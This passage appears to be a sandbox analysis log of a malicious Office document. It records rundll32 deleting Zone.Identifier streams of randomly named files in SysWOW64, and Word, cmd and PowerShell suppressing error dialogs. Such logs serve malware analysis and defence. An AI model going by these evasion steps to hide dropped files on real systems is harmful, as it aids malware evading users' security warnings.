Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Giyrh\pugu.vsm:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Ivtnyogqxjx\ctmhexvkrv.xdn:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Pvbzatsazzovzkv\hcdstjffkhswof.tvm:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Ipdtn\rmgx.ktd:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Wxiibgduobebnp\hfpumnmgeezpt.jsh:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Ndsevdxfleyh\dktakeexwon.agz:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Fmtjatw\czosow.gcn:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Udumexhq\tqqkqid.sqp:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX